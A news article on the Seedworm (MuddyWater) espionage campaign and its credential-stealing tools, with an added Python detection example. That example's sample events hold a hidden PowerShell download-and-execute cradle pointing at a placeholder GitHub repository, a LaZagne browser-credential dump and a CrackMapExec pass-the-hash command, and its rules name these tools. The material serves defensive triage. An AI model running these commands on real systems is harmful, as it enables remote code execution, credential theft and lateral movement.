IT firms, telcos among dozens hacked in new info-stealing malware attack

Seedworm hacking operation adopts new techniques to speed up attacks - but it's come at a cost that's allowed researchers to uncover their activity.
Written by Danny Palmer, Senior Writer

A cyber espionage group is deploying a new type of trojan malware against telecommunications, information technology, and government organisations.

Dubbed Seedworm, the group has been operating since at least 2017, and although it predominantly looks to infiltrate organisations in the Middle East, organisations based in Europe and North America have also been targets.

The hacking operation -- also known as MuddyWater -- has been highly active in recent months and researchers at Symantec say the espionage campaign has stolen information from more than 130 victims across 30 organisations since September this year. The attacks appear to be focused on stealing passwords, especially for web accounts, as well as internal communications data and other information.

Seedworm's latest campaign was uncovered after researchers discovered evidence of activity on a computer inside the Brazil-based embassy of what Symantec refers to as "an oil-producing nation".

The embassy computer had also been compromised by Russian hacking group APT28 -- aka FancyBear -- but there's no evidence to suggest the hacking groups were aware of each other.

However, due to what researchers describe as "a preference for speed and agility over operational security", it was possible to trace Seedworm's activity, revealing what the attackers took once they got into the network and how they did it.

Since it began operating, Seedworm has used a custom backdoor called Powermud, which has been updated continually in an effort to evade detection.

Spear-phishing is the main means of delivering the malware. Once installed on a target system, it first runs tools designed to steal passwords saved in the user's web browsers and email client. Seedworm then uses open-source tools such as LaZagne and CrackMapExec to obtain Windows authentication credentials and to move laterally across the network.


But thanks to poor operational security by the attackers, researchers have uncovered a new variant of the Powermud backdoor -- Powemuddy -- which enables additional activity and has helped Seedworm to successfully compromise 30 organisations in the space of a few months.

In total, 131 individuals were found to be infected with Seedworm malware, with the highest concentration in the Middle East. Multinational organisations with interests in the region but operating in Europe and North America were also found to have been compromised. It's highly likely the attackers planned to compromise specific targets.

"The organisations with more than three or four victims almost certainly were targeted by the Seedworm actors specifically and were not accidental compromises. The organisations with multiple victims likely had multiple employees sent spear phishing emails," Jonathan Wrolstad, threat researcher at Symantec, told ZDNet.

To speed up the campaign, Seedworm took to storing its scripts in a GitHub repository. That shortcut came at the cost of operational security and allowed researchers to uncover the activity.

"We think the Seedworm actors use GitHub like a notepad to store their scripts for easy access. This shows how they value speed and agility over the security of their operations. There is nothing in the scripts that self-evidently shows that the scripts are being used for malicious activity. The scripts are similar to those that a red team may also use," said Wrolstad.
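The two behaviours the article describes, credential theft and lateral movement with LaZagne and CrackMapExec, and scripts kept in a GitHub repository, both leave traces in ordinary process-creation telemetry. The following is an added example written for this page, not Symantec's detection logic and not code from the Seedworm actors: it runs a small rule set over constructed Sysmon-style process-creation events. The tool names come from the article; the LaZagne module keywords and CrackMapExec protocol arguments are those tools' own command-line vocabulary. Two things are assumptions rather than statements from the page: that repository-hosted scripts are pulled at run time with a PowerShell download cradle from a GitHub domain (the repository path in the sample is a placeholder), and that the spear-phishing lure is an Office document that spawns a script host.

```python
"""Added example: flag the tooling this article attributes to Seedworm in
process-creation telemetry. Not Symantec's logic; sample events are constructed
and the GitHub repository path is a placeholder."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    evidence: str


# Tool rules, applied to "<image path> <command line>". LaZagne and CrackMapExec
# are named on the page; the protocol keywords (smb, winrm, ...) are CME's own
# sub-commands and make a hit say what was attempted.
TOOL_RULES = [
    ("lazagne_stored_credential_dump",
     re.compile(r"\blazagne(\.exe|\.py)?\b", re.I)),
    ("crackmapexec_lateral_movement",
     re.compile(r"\b(crackmapexec|cme)(\.exe|\.py)?\s+(smb|winrm|ssh|mssql|ldap)\b", re.I)),
]

# Assumption (not stated on the page): scripts stored in a GitHub repository are
# fetched at run time by a PowerShell download cradle. The domains are GitHub's
# real ones; any repository path in the samples is a placeholder.
GITHUB_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b)"
    r".*https?://(raw\.githubusercontent\.com|github\.com)/", re.I)

# Assumption: the spear-phishing lure is an Office document. The page only says
# spear-phishing delivers the malware, not what the attachment is.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[Finding]:
    """Apply every rule to one process-creation event and return all matches."""
    text = f"{event['image']} {event['cmdline']}"
    hits: List[Finding] = []
    for name, pattern in TOOL_RULES:
        if pattern.search(text):
            hits.append(Finding(event["host"], event["user"], name, event["cmdline"]))
    if GITHUB_CRADLE.search(event["cmdline"]):
        hits.append(Finding(event["host"], event["user"], "github_hosted_script_fetch", event["cmdline"]))
    if _basename(event["parent"]) in OFFICE_PARENTS and _basename(event["image"]) in SCRIPT_HOSTS:
        hits.append(Finding(event["host"], event["user"], "office_spawned_script_host", event["cmdline"]))
    return hits


def detect(events: Iterable[Dict[str, str]]) -> List[Finding]:
    return [finding for event in events for finding in evaluate(event)]


def hosts_by_rule(findings: Iterable[Finding]) -> Dict[str, List[str]]:
    """Group affected hosts per rule so triage can be queued per technique."""
    grouped: Dict[str, List[str]] = {}
    for finding in findings:
        hosts = grouped.setdefault(finding.rule, [])
        if finding.host not in hosts:
            hosts.append(finding.host)
    return grouped


# Constructed sample telemetry (Sysmon event 1 / Windows 4688 fields), not real logs.
SAMPLE_EVENTS = [
    {"host": "ws-017", "user": "CORP\\analyst1",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://raw.githubusercontent.com/example-user/example-repo/master/stage.ps1')\""},
    {"host": "ws-017", "user": "CORP\\analyst1",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\analyst1\AppData\Local\Temp\laZagne.exe",
     "cmdline": "laZagne.exe browsers"},
    {"host": "ws-017", "user": "CORP\\analyst1",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Python27\python.exe",
     "cmdline": "python.exe crackmapexec smb 10.10.20.0/24 -u analyst1 -H <nt-hash>"},
    {"host": "ws-003", "user": "CORP\\jdoe",  # benign admin script, should not fire
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"{finding.host} {finding.user} {finding.rule}: {finding.evidence}")
    print(hosts_by_rule(detect(SAMPLE_EVENTS)))
```

On the sample data the first three events all fire on one host, which is the chain the article describes: an Office-spawned PowerShell pulling a script from GitHub, then LaZagne against browser credentials, then CrackMapExec over SMB. Wrolstad's point about the scripts applies to the tooling as well: LaZagne and CrackMapExec are also used by red teams, so these rules are a triage queue, not a block list, and hosts with authorised testing need to be excluded before alerting.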

Nonetheless, despite leaving a trail of activity, Seedworm should still be classed as a skilled cyber espionage group focused on high-value targets.

Symantec has notified organisations about Seedworm's latest targets and techniques and has provided a list of Indicators of Compromise.
